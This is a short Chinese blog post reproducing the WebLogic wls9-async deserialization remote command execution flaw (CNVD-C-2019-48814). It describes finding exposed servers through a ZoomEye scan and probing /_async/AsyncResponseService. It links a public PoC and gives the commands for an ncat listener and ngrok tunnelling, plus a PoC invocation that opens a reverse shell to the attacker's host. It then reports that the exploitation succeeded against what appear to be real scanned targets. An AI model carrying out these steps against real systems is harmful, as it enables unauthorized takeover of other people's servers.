WebLogic wls9-async反序列化远程命令执行漏洞复现

WebLogic wls9-async反序列化远程命令执行漏洞复现(CNVD-C-2019-48814)

该漏洞是由wls9_async_response组件导致,在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,未授权的情况下远程执行命令。部分版本WebLogic中默认包含的wls9_async_response包,主要是为WebLogic Server提供异步通讯服务。


利用zoomeye扫描到的ip


首先访问 目标ip + /_async/AsyncResponseService 来判断是否启用该组件,如果存在则有可能存在此漏洞。

漏洞原理是向/_async/AsyncResponseService发送XMLPoc,连接类型content-type: text/xml

利用poc

https://github.com/fuhei/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.py

首先用ncat监听端口8889

1
ncat -lvp 8889

然后利用ngrok进行内网穿透。下面这片文章写的非常好!

https://bbs.ichunqiu.com/thread-53000-1-1.html

最后利用poc尝试反弹端口getshell

python2 CNVD-C-2019-48814.py -l <ngrok分配的免费域名> -p <ngrok分配的端口> -r <目标ip+端口>

命令执行后,发现端口转发已经收到了

漏洞利用成功

文章目录
  1. 1. WebLogic wls9-async反序列化远程命令执行漏洞复现(CNVD-C-2019-48814)
,